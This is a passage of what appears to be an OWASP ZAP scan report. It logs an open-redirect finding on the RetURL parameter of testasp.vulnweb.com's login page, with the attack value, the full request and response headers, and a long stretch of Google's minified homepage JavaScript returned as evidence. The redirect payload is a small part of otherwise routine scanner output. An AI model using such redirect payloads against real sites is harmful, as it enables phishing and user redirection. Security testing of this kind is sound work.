rgba(0,0,0,0.2)","rgba(0,0,0,0.1)","#dadce0","#fff","#1a0dab","#ebebeb","#202124","#70757a",false,true,true,false,false,false,false,false,false,false,false,false,"#1a73e8","#8ab4f8","#1c3aa9","#0f9d58","#87ceac","#9e9e9e","rgba(0,0,0,.26)","#bdbdbd","#000","#5f6368","#dadce0",false,true,false,false,false,true,false,false,false,false,false,false,false,"8px","#ebebeb",false,true,false,"%.@.\"\",\"\",\"0\",null,null,null,1]","0","%.@.null,1,1,null,[null,757,1440]]","8M/qAlUr4l/+csJGNfb3NA\u003d\u003d","%.@.\"#b8bbbe\"]","%.@.0]","%.@.0]","%.@.\"0px 5px 26px 0px rgba(0,0,0,0.22),0px 20px 28px 0px rgba(0,0,0,0.3)\",\"#fff\"]","%.@.null,null,null,null,null,null,null,null,null,null,null,null,null,null,\"#202124\",\"#70757a\",null,\"#202124\"]",null,"%.@.[],0,null,0,0]","en-IN","%.@.\"13px\",\"16px\",\"11px\",13,16,11,\"8px\",8,20]","en_IN","%.@.\"10px\",10,\"16px\",16,\"18px\"]","%.@.\"14px\",14]","%.@.40,32,14]",null,"%.@.\"0 2px 10px 0 rgba(0,0,0,0.2)\"]","%.@.0,\"14px\",\"500\",\"500\",\"0 1px 1px rgba(0,0,0,.16)\",\"pointer\",\"#000\",\"rgba(0,0,0,.26)\",\"#70757a\",\"#202124\",\"rgba(204,204,204,.15)\",\"rgba(204,204,204,.25)\",\"rgba(112,117,122,.20)\",\"rgba(112,117,122,.40)\",\"#34a853\",\"#4285f4\",\"#1558d6\",\"#ea4335\",\"#fbbc04\",\"#f8f9fa\",\"#f8f9fa\",\"#202124\",\"#34a853\",\"rgba(0,0,0,.12)\",null,\"#fff\",\"rgba(255,255,255,.30)\",\"#fff\",\"#202124\",\"#fff\",null,0]","%.@.\"20px\",\"500\",\"400\",\"13px\",\"15px\",\"15px\",\"Roboto,RobotoDraft,Helvetica,Arial,sans-serif\",\"24px\",\"400\",\"32px\",\"24px\"]",false,"","%.@.null,null,null,null,\"20px\",\"20px\",\"18px\",\"40px\",\"36px\",\"32px\",null,null,null,null,null,null,\"#fff\",null,null,null,\"#fff\",null,null,null,\"#e8f0fe\",null,\"#e8f0fe\",null,null,\"16px\",\"12px\",\"8px\",\"4px\",\"#fff\",\"#e8f0fe\",\"#1967d2\",\"transparent\",\"#1a0dab\",\"#dadce0\",\"999rem\",\"8px\",\"#1967d2\",\"transparent\",\"#3c4043\",\"#dadce0\",\"#1967d2\",\"transparent\",\"#1a73e8\",\"#dadce0\",\"999rem\",\"Google Sans,arial,sans-serif-medium,sans-serif\",\"20px\",\"14px\",\"500\",\"#f1f3f4\",\"#202124\",\"#fff\",\"#dadce0\",\"#3c4043\",\"4px\"]","%.@.\"#202124\",\"#3c4043\",\"#1a73e8\",null,\"#70757a\",\"#1a0dab\",\"#609\",null,null,\"#fff\",\"#1a73e8\",\"#fff\",\"#e8f0fe\",\"#1558d6\",\"#f1f3f4\",\"#202124\",\"#fff\",\"#3c4043\",\"#202124\",\"#fff\",\"#fff\",\"#fff\",\"#188038\",\"#d93025\",\"#e37400\",\"#dadce0\",\"#fff\",\"rgba(32,33,36,0.6)\",\"#202124\",\"#ebebeb\",\"#d2e3fc\",\"rgba(0,0,0,0.03)\",\"#1a73e8\",\"#70757a\"]","%.@.null,\"none\",null,\"0px 1px 3px rgba(60,64,67,0.08)\",null,\"0px 2px 6px rgba(60,64,67,0.16)\",null,\"0px 4px 12px rgba(60,64,67,0.24)\",null,null,\"1px solid #dadce0\",\"none\",\"none\",\"none\"]","%.@.\"Google Sans,arial,sans-serif\",\"Google Sans,arial,sans-serif-medium,sans-serif\",\"arial,sans-serif\",\"arial,sans-serif-medium,sans-serif\",\"arial,sans-serif-light,sans-serif\"]","%.@.\"16px\",\"12px\",\"0px\",\"8px\",\"4px\",\"2px\",\"20px\",\"24px\"]","%.@.\"#1a0dab\",\"#1a0dab\"]","%.@.null,null,null,null,null,null,null,\"12px\",\"8px\",\"4px\",\"16px\",\"2px\",\"999rem\",\"0px\"]","%.@.\"700\",\"400\",\"underline\",\"none\",\"capitalize\",\"none\",\"uppercase\",\"none\",\"500\",\"lowercase\",\"italic\",\"-1px\",\"0.3px\"]","%.@.\"20px\",\"26px\",\"400\",\"Google Sans,arial,sans-serif\",null,\"arial,sans-serif\",\"14px\",\"400\",\"22px\",null,\"16px\",\"24px\",\"400\",\"Google Sans,arial,sans-serif\",null,\"Google Sans,arial,sans-serif\",\"60px\",\"48px\",\"-1px\",null,\"400\",\"Google Sans,arial,sans-serif\",\"36px\",\"400\",\"48px\",null,\"Google Sans,arial,sans-serif\",\"36px\",\"28px\",null,\"400\",null,\"arial,sans-serif\",\"24px\",\"18px\",null,\"400\",\"arial,sans-serif\",\"16px\",\"12px\",null,\"400\",\"arial,sans-serif\",\"22px\",\"16px\",null,\"400\",\"arial,sans-serif\",\"26px\",\"20px\",null,\"400\",\"Google Sans,arial,sans-serif\",\"20px\",\"16px\",null,\"400\",\"arial,sans-serif\",\"18px\",\"14px\",null,\"400\",\"Google Sans,arial,sans-serif\",\"32px\",\"24px\",null,\"500\",\"14px\",\"Google Sans,arial,sans-serif-medium,sans-serif\",\"20px\",\"500\"]","%.@.\"hsla(0,0%,100%,0)\"]","%.@.4]","%.@.\"14px\",14,\"16px\",16,\"0\",0,\"none\",632,\"1px solid #dadce0\",\"normal\",\"normal\",\"#70757a\",\"12px\",\"1.34\",\"1px solid #dadce0\",\"none\",\"0\",\"none\",\"none\",\"none\",\"none\",\"6px\",\"632px\"]","%.@.\"0\"]","%.@.\"rgba(0,0,0,0.0)\",\"rgba(0,0,0,0.54)\",\"rgba(0,0,0,0.8)\",\"rgba(248, 249, 250, 0.85)\",\"#202124\",\"#dadce0\",\"rgba(218, 220, 224, 0.0)\",\"rgba(218, 220, 224, 0.7)\",\"#dadce0\",\"#f8f9fa\",\"#000\",\"#1a73e8\",\"#dadce0\",\"#fff\",\"#fff\",null,\"#70757a\",\"rgba(0,0,0,0.26)\",\"rgba(0,0,0,0.2)\",\"rgba(0,0,0,0.5)\",\"rgba(0,0,0,0.2)\",\"#fff\",\"rgba(0,0,0,0.1)\",\"#fff\",\"#70757a\",null,\"#000\",\"#fff\",\"#000\"]","%.@.\"#202124\",\"#70757a\",\"#4d5156\",\"#5f6368\",\"#fff\",\"rgba(255,255,255,.70)\",28,24,26,20,16,-2,0,-4,2,0,0,24,20,20,14,12]","%.@.\"20px\",20,\"14px\",14,\"\\\"rgba(0, 0, 0, .87)\\\"\"]","",false,"105250506097979753968","%.@.1]"];})();(function(){google.llio=true;google.llirm='400px';google.ldi={};google.pim={};})(); window.jsl=window.jsl||{};window.jsl.dh=function(a,b,f){try{var g=document.getElementById(a);if(g)g.innerHTML=b,f&&f();else{var c={id:a,script:String(!!f),milestone:String(google.jslm||0)};google.jsla&&(c.async=google.jsla);var h=a.indexOf("_"),d=0<h?a.substring(0,h):"",k=document.createElement("div");k.innerHTML=b;var e=k.children[0];if(e&&(c.tag=e.tagName,c["class"]=String(e.className||null),c.name=String(e.getAttribute("jsname")),d)){a=[];var l=document.querySelectorAll('[id^="'+d+'_"]');for(b=0;b<l.length;++b)a.push(l[b].id);c.ids=a.join(",")}google.ml(Error(d?"Missing ID with prefix "+d:"Missing ID"),!1,c)}}catch(m){google.ml(m,!0,{"jsl.dh":!0})}};(function(){var x=true; google.jslm=x?2:1;})();google.x(null, function(){(function(){(function(){google.csct={};google.csct.ps='AOvVaw2h3ca29Cgw8r0kVUiUNXcN\x26ust\x3d1647330889799938';})();})();(function(){(function(){google.csct.rw=true;})();})();(function(){(function(){google.csct.rl=true;})();})();(function(){google.drty&&google.drty(undefined,true);})();});google.drty&&google.drty(undefined,true);</script></body></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=http%3A%2F%2Fwww.google.com%2F |
| Method | POST |
| Parameter | RetURL |
| Attack | http://www.google.com/ |
| Evidence | <title>Google</title> |
| Request Header - size: 452 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=http%3A%2F%2Fwww.google.com%2F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 1,245 bytes. |
HTTP/1.1 200 OK
Date: Mon, 14 Mar 2022 07:54:32 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: ASPSESSIONIDCQRDQBRC=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/; domain=www.google.com Set-Cookie: ASPSESSIONIDCQRDQBRC=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/; domain=.www.google.com Set-Cookie: ASPSESSIONIDCQRDQBRC=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/; domain=google.com Set-Cookie: ASPSESSIONIDCQRDQBRC=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/; domain=.google.com Set-Cookie: NID=511=sR1c2wY_fT0hPwjlSlT60m5bG5lnlquzwsIM8aor6R8U_2iPV_IIrTBZlJkj-tDA_gq3FNlLUmeEToQWZHxqZarrA3QVppS6nQvTmcZzBGbHGsMVAoPnQt8IRHjYVqoC0-EkXY-mPHMyT9I65AnSrDzNKkXo2-EJqVAdnEao6aM; expires=Tue, 13-Sep-2022 07:54:32 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Accept-Encoding |
| Response Body - size: 111,335 bytes. |
<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en-IN"><head><meta charset="UTF-8"><meta content="origin" name="referrer"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><link href="/manifest?pwa=webhp" crossorigin="use-credentials" rel="manifest"><title>Google</title><script nonce="5ySziL3YJHRCAmDtf1BIGA==">(function(){window.google={kEI:'uPQuYr-_B-yD1e8PwcG16Ag',kEXPI:'31',kBL:'skq8'};google.sn='webhp';google.kHL='en-IN';})();(function(){
var f=this||self;var h,k=[];function l(a){for(var b;a&&(!a.getAttribute||!(b=a.getAttribute("eid")));)a=a.parentNode;return b||h}function m(a){for(var b=null;a&&(!a.getAttribute||!(b=a.getAttribute("leid")));)a=a.parentNode;return b} function n(a,b,c,d,g){var e="";c||-1!==b.search("&ei=")||(e="&ei="+l(d),-1===b.search("&lei=")&&(d=m(d))&&(e+="&lei="+d));d="";!c&&f._cshid&&-1===b.search("&cshid=")&&"slh"!==a&&(d="&cshid="+f._cshid);c=c||"/"+(g||"gen_204")+"?atyp=i&ct="+a+"&cad="+b+e+"&zx="+Date.now()+d;/^http:/i.test(c)&&"https:"===window.location.protocol&&(google.ml&&google.ml(Error("a"),!1,{src:c,glmm:1}),c="");return c};h=google.kEI;google.getEI=l;google.getLEI=m;google.ml=function(){return null};google.log=function(a,b,c,d,g){if(c=n(a,b,c,d,g)){a=new Image;var e=k.length;k[e]=a;a.onerror=a.onload=a.onabort=function(){delete k[e]};a.src=c}};google.logUrl=n;}).call(this);(function(){ google.y={};google.sy=[];google.x=function(a,b){if(a)var c=a.id;else{do c=Math.random();while(google.y[c])}google.y[c]=[a,b];return!1};google.sx=function(a){google.sy.push(a)};google.lm=[];google.plm=function(a){google.lm.push.apply(google.lm,a)};google.lq=[];google.load=function(a,b,c){google.lq.push([[a],b,c])};google.loadAll=function(a,b){google.lq.push([a,b])};google.bx=!1;google.lx=function(){};}).call(this);google.f={};(function(){ document.documentElement.addEventListener("submit",function(b){var a;if(a=b.target){var c=a.getAttribute("data-submitfalse");a="1"===c||"q"===c&&!a.elements.q.value?!0:!1}else a=!1;a&&(b.preventDefault(),b.stopPropagation())},!0);document.documentElement.addEventListener("click",function(b){var a;a:{for(a=b.target;a&&a!==document.documentElement;a=a.parentElement)if("A"===a.tagName){a="1"===a.getAttribute("data-nohref");break a}a=!1}a&&b.preventDefault()},!0);}).call(this);(function(){google.hs={h:true,nhs:false,sie:false};})();(function(){google.c={btfi:false,frt:false,gl:true,lhc:false,ll:true,nli:false,timl:false,wve:true};(function(){ var e=this||self;var g=window.performance;google.timers={};google.startTick=function(a){google.timers[a]={t:{start:Date.now()},e:{},m:{}}};google.tick=function(a,b,c){google.timers[a]||google.startTick(a);c=void 0!==c?c:Date.now();b instanceof Array||(b=[b]);for(var d=0,f;f=b[d++];)google.timers[a].t[f]=c};google.c.e=function(a,b,c){google.timers[a].e[b]=c};google.c.b=function(a){var b=google.timers.load.m;b[a]&&google.ml(Error("a"),!1,{m:a});b[a]=!0};google.c.u=function(a){var b=google.timers.load.m;if(b[a]){b[a]=!1;for(a in b)if(b[a])return;google.csiReport()}else{var c="",d;for(d in b)c+=d+":"+b[d]+";";google.ml(Error("b"),!1,{m:a,b:!1===b[a],s:c})}};function h(a,b,c,d){a.addEventListener?a.addEventListener(b,c,d||!1):a.attachEvent&&a.attachEvent("on"+b,c)}function k(a,b,c,d){"addEventListener"in a?a.removeEventListener(b,c,d||!1):a.attachEvent&&a.detachEvent("on"+b,c)} google.rll=function(a,b,c){function d(f){c(f);k(a,"load",d);k(a,"error",d)}h(a,"load",d);b&&h(a,"error",d)};e.google.aft=function(a){a.setAttribute("data-iml",String(Date.now()))};google.startTick("load");var l=google.timers.load;a:{var m=l.t;if(g){var n=g.timing;if(n){var p=n.navigationStart,q=n.responseStart;if(q>p&&q<=m.start){m.start=q;l.wsrt=q-p;break a}}g.now&&(l.wsrt=Math.floor(g.now()))}} function r(a){if("hidden"===document.visibilityState){google.c.wve&&(google.c.fh=a);var b;window.performance&&window.performance.timing&&(b=Math.floor(window.performance.timing.navigationStart+a));google.tick("load","fht",b);return!0}return!1}function t(a){r(a.timeStamp)&&k(document,"visibilitychange",t,!0)}google.c.wve&&(google.c.fh=Infinity);h(document,"visibilitychange",t,!0);r(0);google.c.b("pr");google.c.b("xe");if(google.c.gl){var u=function(a){a&&e.google.aft(a.target)};h(document.documentElement,"load",u,!0);google.c.glu=function(){k(document.documentElement,"load",u,!0)}};}).call(this);})();(function(){ function h(){return window.performance&&window.performance.navigation&&window.performance.navigation.type};function n(a){if(!a||r(a))return 0;if(!a.getBoundingClientRect)return 1;var c=function(b){return b.getBoundingClientRect()};return t(a,c)?0:u(a,c)}function t(a,c){var b;a:{for(b=a;b&&void 0!==b;b=b.parentElement)if("hidden"===b.style.overflow)break a;b=null}if(!b)return!1;a=c(a);c=c(b);return a.bottom<c.top||a.top>=c.bottom||a.right<c.left||a.left>=c.right} function r(a){return"none"===a.style.display?!0:document.defaultView&&document.defaultView.getComputedStyle?(a=document.defaultView.getComputedStyle(a),!!a&&("hidden"===a.visibility||"0px"===a.height&&"0px"===a.width)):!1} function u(a,c){var b=c(a);a=b.left+window.pageXOffset;c=b.top+window.pageYOffset;var d=b.width;b=b.height;var e=0;if(0>=b&&0>=d)return e;var f=window.innerHeight||document.documentElement.clientHeight;0>c+b?e=2:c>=f&&(e=4);if(0>a+d||a>=(window.innerWidth||document.documentElement.clientWidth))e|=8;e||(e=1,c+b>f&&(e|=4));return e};var v=window.location,w="aft afti afts frt hct prt pprt sct".split(" ");function x(a){return(a=v.search.match(new RegExp("[?&]"+a+"=(\\d+)")))?Number(a[1]):-1};var y=window.innerHeight||document.documentElement.clientHeight,z=0,A=0,B=0,C=0,D=0,E=0,F=0,G=0,H=0,I=!0,K=!0,L=-1;function M(a,c,b,d){var e=google.timers.load.t[a];e&&(b||d&&null!=c&&c<e)||google.tick("load",a,c)}function N(a,c,b,d){"1"===a.getAttribute("data-frt")&&(M("frt",d,!1,!0),++C,O());c&&(M("aft",d,!1,!0),M("afti",d,!1,!0),++E,b||++H,O());google.c.timl&&M("iml",d,!1,!0);++A;a.setAttribute("data-frt","0");(google.c.timl||c)&&P()} function P(){var a=google.c.timl?A===z:D===E;!K&&a&&google.c.u("il")} function O(){if(!I){var a=E===D,c=C===B,b=H===G;b=google.c.nli?b:a;if(a&&c){google.c.e("load","ima",String(D));google.c.e("load","imad",String(F));google.c.e("load","aftp",String(Math.round(L)));var d=google.timers.load;a=d.m;if(!a||!a.prs){var e=h()?0:x("qsubts");0<e&&(a=x("fbts"),0<a&&(d.t.start=Math.max(e,a)));var f=d.t,l=f.start;a={wsrt:d.wsrt};for(var m=0,k;k=w[m++];){var p=f[k];p&&l&&(a[k]=p-l)}0<e&&(a.gsasrt=d.t.start-e);e=d.e;d="/gen_204?s="+google.sn+"&t=aft&atyp=csi&ei="+google.kEI+"&rt=";f="";for(g in a)d+=""+f+g+"."+a[g],f=",";for(var q in e)d+="&"+q+"="+e[q];window._cshid&&(d+="&cshid="+window._cshid);2===h()&&(d+="&bb=1");1===h()&&(d+="&r=1");if("gsasrt"in a){var g=x("qsd");0<g&&(d+="&qsd="+g)}google.kBL&&(d+="&bl="+google.kBL);g=d;navigator.sendBeacon?navigator.sendBeacon(g,""):google.log("","",g)}}"hidden"===document.visibilityState&&google.c.e("load","hddn","1");if(null!==google.aftq&&(g=2===google.fevent||3===google.fevent?google.fevent:1,2===g&&c||1===g&&b||3===g&&(b||c))){google.tick("load","aftqf",Date.now());var J;for(c=0;b=null==(J=google.aftq)?void 0:J[c++];)try{b()}catch(R){google.ml(R,!1)}google.aftq=null}}}var Q="src bsrc url ll image img-url".split(" ");function S(a){for(var c=0,b;b=Q[c++];)if(a.getAttribute("data-"+b))return!0;return!1}function T(a,c){0===c||c&8||(a.setAttribute("data-frt","1"),++B)}google.c.b("il");google.c.setup=function(a,c,b){var d=a.getAttribute("data-atf");if(d)return b=Number(d),c&&!a.hasAttribute("data-frt")&&T(a,b),b;var e="string"!==typeof a.src||!a.src,f=!!a.getAttribute("data-bsrc");d=!!a.getAttribute("data-deferred");var l=!d&&S(a);l&&a.setAttribute("data-lzy_","1");var m=n(a);a.setAttribute("data-atf",String(m));var k=!!(m&1);e=(e||a.complete)&&!d&&!f&&!(google.c.ll&&k&&l);f=!google.c.lhc&&Number(a.getAttribute("data-iml"))||0;++z;if(e&&!f||a.hasAttribute("data-noaft"))a.setAttribute("data-frt","0"),++A;else{var p=google.c.btfi&&m&4&&f&&L<y;if(p){var q=a.getBoundingClientRect().top+window.pageYOffset;!b||q<b?L=k?y:q:p=!1}k&&(++D,d&&++F,l||++G);c&&T(a,m);p&&M("aft",f,!1,!0);e&&f?N(a,k,l,google.c.btfi?0:f):(k&&(!b||b>=y)&&(L=y),google.rll(a,!0,function(){N(a,k,l,Date.now())}))}return m};google.c.ubr=function(a,c,b){0>L&&(b&&(L=b),google.c.btfi&&M("aft",c));a||M("afts",c,!0);M("aft",c,!0);I&&!google.c.frt&&(I=!1,O());a&&K&&(M("prt",c),google.c.timl&&M("iml",c,!0),K=!1,P(),google.c.setup=function(){return 0},google.c.ubr=function(){})};}).call(this);(function(){ var b=[function(){google.tick&&google.tick("load","dcl")}];google.dclc=function(a){b.length?b.push(a):a()};function c(){for(var a=b.shift();a;)a(),a=b.shift()}window.addEventListener?(document.addEventListener("DOMContentLoaded",c,!1),window.addEventListener("load",c,!1)):window.attachEvent&&window.attachEvent("onload",c);}).call(this);(function(){ var b=[];google.jsc={xx:b,x:function(a){b.push(a)},mm:[],m:function(a){google.jsc.mm.length||(google.jsc.mm=a)}};}).call(this);(function(){ var e=this||self; var f={};function w(a,c){if(null===c)return!1;if("contains"in a&&1==c.nodeType)return a.contains(c);if("compareDocumentPosition"in a)return a==c||!!(a.compareDocumentPosition(c)&16);for(;c&&a!=c;)c=c.parentNode;return c==a};var x=function(a,c){return function(d){d||(d=window.event);return c.call(a,d)}},z="undefined"!=typeof navigator&&/Macintosh/.test(navigator.userAgent),A=function(){this._mouseEventsPrevented=!0};var F=function(a){this.g=a;this.h=[]},G=function(a){for(var c=0;c<a.h.length;++c){var d=a.g,b=a.h[c];d.removeEventListener?d.removeEventListener(b.eventType,b.o,b.capture):d.detachEvent&&d.detachEvent("on"+b.eventType,b.o)}a.h=[]}; var H=e._jsa||{};H._cfc=void 0;H._aeh=void 0;var I=function(){this.h=this.g=null},K=function(a,c){var d=J;d.g=a;d.h=c;return d};I.prototype.i=function(){var a=this.g;this.g&&this.g!=this.h?this.g=this.g.__owner||this.g.parentNode:this.g=null;return a};var L=function(){this.j=[];this.g=0;this.h=null;this.l=!1};L.prototype.i=function(){if(this.l)return J.i();if(this.g!=this.j.length){var a=this.j[this.g];this.g++;a!=this.h&&a&&a.__owner&&(this.l=!0,K(a.__owner,this.h));return a}return null};var J=new I,M=new L; var Q=function(){this.s=[];this.g=[];this.h=[];this.l={};this.i=null;this.j=[];N(this,"_custom")},R=function(a){return String.prototype.trim?a.trim():a.replace(/^\s+/,"").replace(/\s+$/,"")},ha=function(a,c){return function m(b,g){g=void 0===g?!0:g;var l=c;if("_custom"==l){l=b.detail;if(!l||!l._type)return;l=l._type}var k=l;"click"==k&&(z&&b.metaKey||!z&&b.ctrlKey||2==b.which||null==b.which&&4==b.button||b.shiftKey)?k="clickmod":"keydown"==k&&!b.a11ysc&&(k="maybe_click");var u=b.srcElement||b.target;l=S(k,b,u,"",null);if(b.path){M.j=b.path;M.g=0;M.h=this;M.l=!1;var O=M}else O=K(u,this);for(var r;r=O.i();){var h=r;var p=void 0;r=h;var q=k,aa=b;var n=r.__jsaction;if(!n){var y;n=null;"getAttribute"in r&&(n=r.getAttribute("jsaction"));if(y=n){n=f[y];if(!n){n={};for(var B=y.split(ba),ca=B?B.length:0,C=0;C<ca;C++){var v=B[C];if(v){var D=v.indexOf(":"),P=-1!=D,ea=P?R(v.substr(0,D)):da;v=P?R(v.substr(D+1)):v;n[ea]=v}}f[y]=n}r.__jsaction=n}else n=fa,r.__jsaction=n}"maybe_click"==q&&n.click?(p=q,q="click"):"clickkey"==q?q="click":"click"!=q||n.click||(q="clickonly");p=H._cfc&&n.click?H._cfc(r,aa,n,q,p):{eventType:p?p:q,action:n[q]||"",event:null,ignore:!1};l=S(p.eventType,p.event||b,u,p.action||"",h,l.timeStamp);if(p.ignore||p.action)break}l&&"touchend"==l.eventType&&(l.event._preventMouseEvents=A);if(p&&p.action){if("mouseenter"==k||"mouseleave"==k||"pointerenter"==k||"pointerleave"==k)if(u=b.relatedTarget,!("mouseover"==b.type&&"mouseenter"==k||"mouseout"==b.type&&"mouseleave"==k||"pointerover"== b.type&&"pointerenter"==k||"pointerout"==b.type&&"pointerleave"==k)||u&&(u===h||w(h,u)))l.action="",l.actionElement=null;else{k={};for(var t in b)"function"!==typeof b[t]&&"srcElement"!==t&&"target"!==t&&(k[t]=b[t]);k.type="mouseover"==b.type?"mouseenter":"mouseout"==b.type?"mouseleave":"pointerover"==b.type?"pointerenter":"pointerleave";k.target=k.srcElement=h;k.bubbles=!1;l.event=k;l.targetElement=h}}else l.action="",l.actionElement=null;h=l;a.i&&!h.event.a11ysgd&&(t=S(h.eventType,h.event,h.targetElement,h.action,h.actionElement,h.timeStamp),"clickonly"==t.eventType&&(t.eventType="click"),a.i(t,!0));if(h.actionElement||"maybe_click"==h.eventType){if(a.i){if(!h.actionElement||"A"!=h.actionElement.tagName||"click"!=h.eventType&&"clickmod"!=h.eventType||(b.preventDefault?b.preventDefault():b.returnValue=!1),(b=a.i(h))&&g){m.call(this,b,!1);return}}else{if((g=e.document)&&!g.createEvent&&g.createEventObject)try{var E=g.createEventObject(b)}catch(ka){E=b}else E=b;h.event=E;a.j.push(h)}H._aeh&&H._aeh(h)}}},S=function(a,c,d,b,g,m){return{eventType:a,event:c,targetElement:d,action:b,actionElement:g,timeStamp:m||Date.now()}},ia=function(a,c){return function(d){var b=a,g=c,m=!1;"mouseenter"==b?b="mouseover":"mouseleave"==b?b="mouseout":"pointerenter"==b?b="pointerover":"pointerleave"==b&&(b="pointerout");if(d.addEventListener){if("focus"==b||"blur"==b||"error"==b||"load"==b)m=!0;d.addEventListener(b,g,m)}else d.attachEvent&&("focus"==b?b="focusin":"blur"==b&&(b="focusout"),g=x(d,g),d.attachEvent("on"+b,g));return{eventType:b,o:g,capture:m}}},N=function(a,c){if(!a.l.hasOwnProperty(c)){var d=ha(a,c),b=ia(c,d);a.l[c]=d;a.s.push(b);for(d=0;d<a.g.length;++d){var g=a.g[d];g.h.push(b.call(null,g.g))}"click"==c&&N(a,"keydown")}};Q.prototype.o=function(a){return this.l[a]};var W=function(a,c){var d=new F(c);a:{for(var b=0;b<a.g.length;b++)if(T(a.g[b].g,c)){c=!0;break a}c=!1}if(c)return a.h.push(d),d;U(a,d);a.g.push(d);V(a);return d},V=function(a){for(var c=a.h.concat(a.g),d=[],b=[],g=0;g<a.g.length;++g){var m=a.g[g];X(m,c)?(d.push(m),G(m)):b.push(m)}for(g=0;g<a.h.length;++g)m=a.h[g],X(m,c)?d.push(m):(b.push(m),U(a,m));a.g=b;a.h=d},U=function(a,c){var d=c.g;ja&&(d.style.cursor="pointer");for(d=0;d<a.s.length;++d)c.h.push(a.s[d].call(null,c.g))},Y=function(a,c){a.i=c;a.j&&(0<a.j.length&&c(a.j),a.j=null)},X=function(a,c){for(var d=0;d<c.length;++d)if(c[d].g!=a.g&&T(c[d].g,a.g))return!0;return!1},T=function(a,c){for(;a!=c&&c.parentNode;)c=c.parentNode;return a==c},ja="undefined"!=typeof navigator&&/iPhone|iPad|iPod/.test(navigator.userAgent),ba=/\s*;\s*/,da="click",fa={};var Z=new Q;W(Z,window.document.documentElement);N(Z,"click");N(Z,"focus");N(Z,"focusin");N(Z,"blur");N(Z,"focusout");N(Z,"error");N(Z,"load");N(Z,"auxclick");N(Z,"change");N(Z,"dblclick");N(Z,"input");N(Z,"keyup");N(Z,"keydown");N(Z,"keypress");N(Z,"mousedown");N(Z,"mouseenter");N(Z,"mouseleave");N(Z,"mouseout");N(Z,"mouseover");N(Z,"mouseup");N(Z,"paste");N(Z,"touchstart");N(Z,"touchend");N(Z,"touchcancel");N(Z,"transitioncancel");N(Z,"transitionend");N(Z,"transitionrun");N(Z,"transitionstart");N(Z,"speech");(function(a){google.jsad=function(c){Y(a,c)};google.jsaac=function(c){return W(a,c)};google.jsarc=function(c){G(c);for(var d=!1,b=0;b<a.g.length;++b)if(a.g[b]===c){a.g.splice(b,1);d=!0;break}if(!d)for(d=0;d<a.h.length;++d)if(a.h[d]===c){a.h.splice(d,1);break}V(a)}})(Z);e.gws_wizbind=function(a){return{trigger:function(c){var d=a.o(c.type);d||(N(a,c.type),d=a.o(c.type));var b=c.target||c.srcElement;d&&d.call(b.ownerDocument.documentElement,c)},bind:function(c){Y(a,c)}}}(Z);}).call(this);(function(){ function b(c){var a;a:{for(a=c.target;a&&a!==document.documentElement;a=a.parentElement)if("A"===a.tagName&&"1"===a.getAttribute("data-jsarwt"))break a;a=null}a&&window.jsarwt(a,null,c);return!0};window.document.documentElement.addEventListener("mousedown",b,!0);window.document.documentElement.addEventListener("touchstart",b,!0);}).call(this);</script> <script nonce="5ySziL3YJHRCAmDtf1BIGA==">(function(){google.xjs={ck:'xjs.s.OhEY3Yzzv5g.L.F4.O',cs:'ACT90oGyVU-TJE4SaHr6JQmf_mpvOBTHpg',excm:[]};})();</script> <script nonce="5ySziL3YJHRCAmDtf1BIGA==">(function(){google.kEXPI='0,3700311,660,15,415564,45392,2822,54891,14680,15613,58278,4085,4143,555,8247,14322,20957,5539,20886,14778,11444,29214,6692,49740,16576,3691,11562,17007,2719,18233,46,9869,8702,6717,16700,37615,7663,347,423,5586,3163,3308,845,1787,13496,3737,969,1452,2669,4368,1876,930,2823,4299,4576,5775,562,2145,15,436,754,165,3295,589,1218,1731,221,274,523,503,940,1498,479,1031,1664,285,389,825,1864,14269694,26743458,1284951';})();function _DumpException(e){throw e;} function _F_installCss(c){} (function(){window.google.xjsu='/xjs/_/js/k\x3dxjs.s.en_GB.u31cbyd-Fyk.O/am\x3dAFQAwAAAAABzQQEAAAAAAAAEAk8sAACER0ISAAAACAAAAAQBBgQBAAAAfEQXAMAfAMAAS7gAAAAAAAAABNgSZKhBIiAABAAAAAAQq4kqBgABgA/d\x3d1/ed\x3d1/dg\x3d2/esmo\x3d1/rs\x3dACT90oH0ioRgmiSty5PfvvLeQvdQ7eesFg/m\x3dcdos,cr,dpf,hsm,jsa,d,csi';})();</script> <script defer="" src="/xjs/_/js/k=xjs.s.en_GB.u31cbyd-Fyk.O/am=AFQAwAAAAABzQQEAAAAAAAAEAk8sAACER0ISAAAACAAAAAQBBgQBAAAAfEQXAMAfAMAAS7gAAAAAAAAABNgSZKhBIiAABAAAAAAQq4kqBgABgA/d=1/ed=1/dg=2/esmo=1/rs=ACT90oH0ioRgmiSty5PfvvLeQvdQ7eesFg/m=cdos,cr,dpf,hsm,jsa,d,csi" nonce="5ySziL3YJHRCAmDtf1BIGA=="></script> <script nonce="5ySziL3YJHRCAmDtf1BIGA==">(function(){ window.rwt=function(){return!0};}).call(this);(function(){ var a=this||self;function d(c){var b;a:{if(b=a.navigator)if(b=b.userAgent)break a;b=""}return-1!=b.indexOf(c)};function h(){return 